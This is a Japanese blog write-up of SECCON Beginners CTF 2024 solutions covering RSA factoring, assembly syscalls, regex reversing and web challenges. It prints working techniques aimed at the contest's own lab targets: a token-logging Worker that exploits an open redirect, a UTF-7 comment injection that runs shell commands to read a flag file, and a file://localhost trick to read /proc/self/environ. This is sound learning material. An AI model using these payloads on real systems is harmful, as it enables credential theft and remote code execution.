Asa's Website

SECCON Beginners CTF 2024 Writeup

participation logctfwriteup

作成日 / 最終更新日

Table of Contents

CTF の初心者向け大会 SECCON Beginners CTF 2024 に参加しました。
参加記 Writeup を書きます。

動機

CTF なんもわからんけど面白そうだからやるぞ!
多少セキュリティの知識はあるつもりだけどそこまで詳しくはない人です。
1 人で参加しました。

やる

作業リポジトリは a01sa01to/seccon-beginners-2024 にあります。
解けた順に書きます。

Welcome

Welcome to SECCON Beginners CTF 2024! フラグはDiscordサーバのannouncementsチャンネルにて公開されています! The flag is on Discord.

らしいので、 Discord サーバの announcements チャンネルを見てみます。
ありました。

ctf4b{Welcome_to_SECCON_Beginners_CTF_2024}
a01sa01to/seccon-beginners-2024@d7a039e

なんか開始直後、ログイン状態がおかしかったのか問題を見ようとすると「ログインしてください」的な画面が出てしまって困りました。
AC 127 番目でした。 (2024-06-15 14:01:55.806 JST)

simpleoverflow (pwn)

次に多く解かれていたのが simpleoverflow だったので、見てみます。
ソースコードを見てみると、 buffer には 10 byte ぶんしか確保していないのに、 read では 0x10 byte、つまり 16 byte ぶん読み込んでいました。

はい。
11 文字以上入力して、 flag をゲットしました。

ctf4b{0n_y0ur_m4rk}
a01sa01to/seccon-beginners-2024@e34f758

AC 23 番目でした。 (2024-06-15 14:03:54.975 JST)

Safe Prime (crypto)

ちょっと用事があったのでまた数時間後に。
とりあえず beginner タグのついた問題を解いておこうと思い、この問題を解きました。

問題概要としては、 RSA 暗号のパラメータ p,qp, q としてソフィー・ジェルマン素数と安全素数を使ってみた!というものです。
q=2p+1q = 2p + 1 が成り立つらしいです。

n=pq=p(2p+1)n = pq = p (2p+1) となるので、 nn が与えられたときに pp を求める問題です。
はい、 †伝家の宝刀 二分探索† が使えますね。

n = ... def solve_p(): ok = 1 ng = n while ng - ok > 1: mid = (ok + ng) // 2 x = mid * (2 * mid + 1) if x <= n: ok = mid else: ng = mid return ok p = solve_p()

こんなかんじ。 Python なので多倍長整数が使えてらく。
これで p,qp,q が求まるので、 RSA の復号をすればよさそうです。
d=e1mod(p1)(q1)d = e^{-1} \bmod (p-1)(q-1) として m=cdmodnm = c^d \bmod n で復号して、出てきた数字を decode したら flag が得られました。

ctf4b{R3l4ted_pr1m3s_4re_vuLner4ble_n0_maTt3r_h0W_l4rGe_p_1s}
a01sa01to/seccon-beginners-2024@bcf7de0

「Related primes are vulnerable no matter how large p is」、確かになぁ
AC 119 番目でした。 (2024-06-15 16:12:24.499 JST)

getRank (misc)

pwn の simpleoverwrite めっちゃ解かれてるやん!でちょっとやってみたが、なんかうまくいかないのでこの問題をやりました。

問題としては、「数当てゲームをして 1 位になってね。ちなみに現在 1 位の人のスコアは 1025510^{255} だよ。」というもの。

もはや正攻法では無理なので (CTF ってそういうものだし)、とりあえずソースを流し読みしてみると、直接スコアをサーバに送って順位を取得しているみたいです。
しかしスコアの文字数は 300 文字までしか受け付けないみたいだし、スコアが 1025510^{255} を超えると「クソデカくね? ハンデとして 1010010^{-100} 倍するで!」っていう処理をしてるみたい。

少し悩みながら parseInt をホバーしてみると、基本的には 10 進数で解釈されるものの、どうやら 0x から始まると 16 進数として解釈されるみたいです。
よって 0xFFF...F を送り付けて通りました!

ctf4b{15_my_5c0r3_700000_b1g?}
a01sa01to/seccon-beginners-2024@85d6e10

0xFFF...F (0x に続いて 298 個の F) は大体 162986×1035816^{298} \approx 6 \times 10^{358} らしく、これを 1010010^{-100} 倍しても 6×102586 \times 10^{258} で良いっぽいです。
AC 165 番目でした。 (2024-06-15 18:58:59.253 JST)

wooorker (web)

Web ならできるかも?ということでやってみました。

ソースコードを読みます。
どうやら「脆弱性報告 bot」なるものが認証情報を持っているらしく、それを使って login?next=... にアクセスさせてログインさせてやるとリダイレクト先に token が searchParams で渡されるらしいです。

すでにホスト名は指定されているので、偽サイトを立てて認証情報を搾取することはできなさそうです。
よって ?next= のリダイレクト先に自分のサイトを指定して、 searchParams に token が付加されているのを確認できれば、それを使ってログインすればよさそうです。

そしたら適当に Cloudflare で立てた自分のサイトにリダイレクトさせてリクエストログで見てみることにしました。
が、リクエストログには /?token=REDACTED の文字が。 Cloudflare ゆるさん
素直に Worker を立てて、 console.log するようにしました。
また、 JWT として認識されて REDACTED にならないように、一応の対策として token 内の . を空白に置換して log するようにしました。

export default { async fetch(request, env, ctx) { const url = new URL(request.url) console.log(url.searchParams.get('token').split('.').join(' ')) return new Response('Hello World!') }, }

これで token を得られたので、この情報を用いて flag ページにアクセスして flag を得ました。

ctf4b{0p3n_r3d1r3c7_m4k35_70k3n_l34k3d}
a01sa01to/seccon-beginners-2024@2d614b0

AC 50 番目でした。 割と早かったっぽい?
(2024-06-15 19:24:28.912)

assemble (reversing)

Intel 記法のアセンブリ言語を書いて、 flag.txt の内容を取得しよう!という問題です。
ページを開くとそのシミュレータみたいなものでした。
4 つのチャレンジに分かれていて、 4 つ目のチャレンジで flag が得られるようです。

1 つ目は、「mov 命令を使って rax0x123 を格納しよう」というもの。
入力欄の placeholder に書いてあるものをそのまま入力して通りました。

mov rax, 0x123

2 つ目は、「rax0x123 を格納してそれを stack に push しよう」というもの。
どうせ push 命令だろうな~と思って書くと通る。

mov rax, 0x123 push rax

3 つ目は、「標準出力に Hello を出力しよう」というもの。
syscall を使ってやるみたいなんですが、かなり悩んだ。
syscallrax にシステムコール番号を、 rdi, rsi, rdx に引数を入れて実行するらしいです。
write システムコールの番号は 1 で、 rdi にファイルディスクリプタ (標準出力なら 1)、 rsi に文字列のアドレス、 rdx に文字列の長さを入れるらしい。

文字列のアドレス?なにそれ? になってたんですが、スタックアドレスを使えばよさそう?ということで rsp を代入することに。
スタックに H (0x48), e (0x65), l (0x6c), l, o (0x6f) を push して、 rdx に 40 (40 bit? よくわからん~と言いながら書いてた) を入れて syscall すると、 stdout には Hello が出力されたものの、通らない...。

うーんこれは運営に報告か?と思いながらも、でも通ってる人いるし、何か違うんだろうな~と思って調べてみると、書き方がよくなかったっぽいです。
0x6F6C6C6548 (Hello の little endian 表現) をスタックに push して rdx に 5 を入れて syscall すると通りました。

mov rax, 1 mov rdi, 1 mov rdx, 5 mov rbx, 0x6f6c6c6548 push rbx mov rsi, rsp syscall

0x48 などとして出力すると間に null 文字が入ってしまって、それが原因だったっぽい?と考察。

最後。 4 つ目は、「flag.txt の内容を標準出力に出力しよう」というもの。
syscall の仕組みを知ったので、 read のマニュアルを見てみます。
ふぁいるでぃすくりぷた?なにそれ? で調べてみたところ、 open でファイルを開いてファイルディスクリプタを取得し、 read で読み込んで、 write で出力すればよいみたいです。

まず open。 rax に 2 、 rdi に flag.txt のアドレス、 rsi に O_RDONLY (0) を入れて syscall します。
が、なんかエラー。
しばらく悩んでいると、文字列の最後に null 文字が入っていないのが原因だったみたいです。
flag.txt がちょうど 8 文字 64 bit だったので null 文字が入らない、そんなことあるのか...。
無事にファイルディスクリプタが取得できたので、 その内容をいったん rbx に保存するようにします。

mov rax, 2 mov rbx, 0 push rbx mov rbx, 0x7478742e67616c66 push rbx mov rdi, rsp mov rsi, 0 syscall mov rbx, rax

次に、 read。 rax に 0 、 rdi に ファイルディスクリプタ、 rsi に バッファのアドレス、 rdx に バッファの長さを入れて syscall します。
バッファはまあ stack でええやろということで rsp を使います。
バッファ長は適当に 1024 にしておきます。

mov rax, 0 mov rdi, rbx mov rsi, rsp mov rdx, 1024 syscall

最後に write で出力します。
rax に 1 、 rdi に 1 (stdout)、 rsi に バッファのアドレス、 rdx に バッファの長さを入れて syscall します。
バッファアドレスは rsp で良いものの、バッファ長ってどうすればいいんだ? (rax に格納されるのを当時の自分は知らない)
とりあえず二分探索して 53 文字であることを突き止め、 53 文字で出力するようにしました。

mov rax, 1 mov rdi, 1 mov rdx, 53 mov rsi, rsp syscall

無事に flag が得られました。

ctf4b{gre4t_j0b_y0u_h4ve_m4stered_4ssemb1y_14ngu4ge}
a01sa01to/seccon-beginners-2024@0040424

「Great job you have mastered assembly language」ほんとか?
AC 71 番目でした。 (2024-06-15 19:52:04.386 JST)

cha-ll-enge (reversing)

とりあえずご飯を食べてから。
土曜なので ABC358 がありましたが、出ずに CTF に集中します。

見たことがない形式のファイルだけど、中身を見れば何かわかるかも...?

中身を見ても何もわかりませんが...?
ということで Gemini に投げてみます。
すると LLVM であることがわかりました。なにそれ?
よくわからんながらも、コンパイラのための中間言語?ということでいったん C 言語に変換してもらうことにしました。
(コードは GitHub のほうにあります。すこし変更していますが)

コードを見てみると、 key が定義されていて、適当に XOR すれば flag が得られるようです。
どうせ flag の最初は ctf4b{ なので、これを用いて規則性を見つけることにしました。
すると、 flag[i] = key[i] XOR key[i+1] という規則性が見つかりました。
これをもとに flag を得ました。

ctf4b{7ick_7ack_11vm_int3rmed14te_repr3sen7a7i0n}
a01sa01to/seccon-beginners-2024@aa95011

AC 159 番目でした。 (2024-06-15 21:40:18.167 JST)
AI すごい。

math (crypto)

RSA暗号に用いられる変数に特徴的な条件があるようですね...?

ということでまずはソースコードを眺めてみる。
p,qp,q から平方数 xx を引いたものも平方数 a,ba,b になるようです。
与えられているのは n,e,c,abn, e, c, ab です。
また、 a,ba, b のクソデカ約数も 1 つずつ与えられています。 (ここではそれぞれ a,ba', b' とします)

とりあえず、 factordba,ba',b' の値を投げてみます。
すると、これらの値は素数であることがわかりました。
とりあえず aba2b2\dfrac{ab}{a'^2 b'^2} を factordb に投げてみると、 321732199230660682777323^2 \cdot 173^2 \cdot 199^2 \cdot 306606827773^2 という値が得られました。
したがって、 ab=32173219923066068277732a2b2ab = 3^2 \cdot 173^2 \cdot 199^2 \cdot 306606827773^2 \cdot a'^2 \cdot b'^2 で表現できます。

a,ba, b が平方数だし、 a,ba',b' 以外の素因数が 3,173,199,3066068277733,173,199,306606827773 しかないので、 a,ba, b の値を bit 全探索で決め打ちます。
その決め打った a,ba,b に対して n=pq=(a+x)(b+x)n = pq = (a+x)(b+x) から xx の値を二分探索し、 (a+x)(b+x)(a+x)(b+x) がちょうど nn であれば p,qp, q が求まったことになります。

こんなかんじ。

lst = [3, 173, 199, 306606827773] for bit in range(1 << 4): a = diva ** 2 b = divb ** 2 for i in range(4): if bit & (1 << i): a *= lst[i] ** 2 else: b *= lst[i] ** 2 assert a * b == ab ok = 0 ng = n while ng - ok > 1: x = (ok + ng) // 2 p = a + x q = b + x if p * q <= n: ok = x else: ng = x if (a + ok) * (b + ok) == n: print("p:", a + ok) print("q:", b + ok)

これで p,qp, q が求まったので、あとはふつうに RSA の復号をして flag をゲットしました。

ctf4b{c0u1d_y0u_3nj0y_7h3_m4theM4t1c5?}
a01sa01to/seccon-beginners-2024@11267c9

「Could you enjoy the mathematics?」まあたのしいね。
AC 76 番目。 (2024-06-15 23:39:12.534 JST)

clamre (misc)

アンチウィルスのシグネチャを読んだことはありますか?

読んだことないや...
とりあえずファイルをダウンロードして、 flag.ldb を見てみます。
めちゃくちゃ正規表現です。
なんか \3 とかあるの謎すぎる、なんで 3 をエスケープするんだ?
まあいいや、とりあえず \x63 とかをアルファベットに戻すと、 /^((ctf)(4)(b)(\{B)(r)(3)\3(k1)(ng)(_)\3(l)\11\10(Th)\7\10(H0)(u)(5)\7\10(R)\14\11\7(5)\})$/ になりました。
いったん \3 とか括弧とかは無視してみると、 ctf4b{Br3k1ng_lThH0u5R5} になるので、これを提出してみます。ダメでした。

いったん眠いので寝ます。
起きました。

手詰まり感が出てきたので Gemini に投げます。
すると、このファイルは ClamAV というアンチウィルスのシグネチャファイルだとわかりました。
ドキュメントを読んでみると、 めちゃくちゃ読みにくいドキュメントであることがわかりました。 \3 などはバックリファレンスで、キャプチャしたグループを参照するものだとわかりました。 $3 みたいなやつか。
めんどくさいので Gemini にやらせたものの全然違う結果になったので、 Colab で ClamAV 走らせてデバッグしながらやることに。
--debug をつけて実行するとキャプチャグループが表示されるので、これを見ながらマッチする flag を探します。

ctf4b{Br34k1ng_4ll_Th3_H0u53_Rul35}
a01sa01to/seccon-beginners-2024@c8d5817

AC 162 番目。 (2024-06-16 08:23:06.325 JST)
正規表現に慣れてないのがよくわかる...

Wooorker2 (web)

Wooorker 解いたしいったん 2 も見てみるか~で解きました。
今度は token は searchParams ではなく hash fragment に入っているようです。
hash fragment はサーバに送信されないので、 Worker でログを取ることはできません。

でも client 側では取得できるので、 searchParams にして再リクエストを送るようにすればええやん!ということで、 Worker の処理に少し変更を加えました。

export default { async fetch(request, env, ctx) { const url = new URL(request.url) if (url.pathname === '/') { const h = new Headers() h.set('Content-Type', 'text/html') return new Response( "<script>location.href = `/hoge${window.location.hash.replace('#', '?')}`</script>", { headers: h }, ) } console.log(url.searchParams.get('token').split('.').join(' ')) return new Response('Hello World!') }, }

hash fragment を searchParams に変換して / から /hoge にリダイレクトするようにしました。
これでログに token が表示されるようになったので、これを使ってログインして flag を得ました。

ctf4b{x55_50m371m35_m4k35_w0rk3r_vuln3r4bl3}
a01sa01to/seccon-beginners-2024@c8cf6dd

AC 78 番目。 (2024-06-16 08:57:38.125 JST)
難易度 medium でしたが解けてうれしい!

commentator (misc)

適当に文字を打ち込むとそれが Python ファイルのコメントとしてファイルに書き込まれるらしい。
まあどうにかしてコメント外に抜け出したいってことだよなぁ

しばらく調べてみると、 Python には Magic Comment という機能があるらしい。
先頭の行に # coding: って書いておくとエンコーディングを指定できるやつ。
これについて調べてみると、まさにこれを使った記事がヒットしました。
UTF-7 を指定すると、 +AAo- という文字列が \n に対応するらしいです。

Dockerfile を見てみると、 flag ファイルは / にあって、 md5sum がファイル名に付加されているらしいです。たいへん。
なのでまずは ls をしてみます。

coding: utf_7 +AAo-import os +AAo-os.system('ls /') __EOF__

こうすると以下のように解釈されます。

# coding: utf_7 # import os # os.system('ls /')

これにより /flag-437541b5d9499db505f005890ed38f0e.txt というファイル名が得られました。
これを cat します。

coding: utf_7 +AAo-import os +AAo-os.system('cat /flag-437541b5d9499db505f005890ed38f0e.txt') __EOF__

これで flag が得られました。

ctf4b{c4r3l355_c0mm3n75_c4n_16n173_0nl1n3_0u7r463}
a01sa01to/seccon-beginners-2024@c81a97d

「Careless comments can integrate online outrage」なるほど。
AC 53 番目。 (2024-06-16 09:57:53.247 JST)

ssrforlfi (web)

これ本番中に解けなかったの悲しい。
惜しいところまで行ったので備忘録として。

ソースコードを見てみると、 ?url= にリクエストを送ると、そのページの HTML が返ってくるようです。
url に含められる文字は限られている上、 http://, https:// で始まって localhost が含まれるなら SSRF、 file:// で実際にファイルが存在するなら LFI として処理を受け付けないようにされています。
また、これ以外のプロトコルは拒否するみたいです。
ここを通り抜けると curl でアクセスして、その結果を返すようです。
flag は環境変数に書かれているようです。

調べてみると、プロセスの環境変数は /proc/self/environ で取得できるらしいです。
これを読むために file:///proc/self/environ を送りたいのですが、まあ LFI で拒否されます。
なのでいい感じにパスを変えて、 Python にはファイルが存在しないように見せかけて curl ではアクセスできるようにしてやりたいです。

でいろいろやっていると時間切れに。
結論から言うと、 file://localhost/proc/self/environ というパスを送るといいらしいです。
いや~知識不足。 file://localhost って指定できるんですねぇ

ctf4b{1_7h1nk_bl0ck3d_b07h_55rf_4nd_lf1}

まとめ

賞状?
賞状?

825 点・ 89 位でした!
なんとなく知識がついた気がします!
CTF にももっと手を出していきたいですね。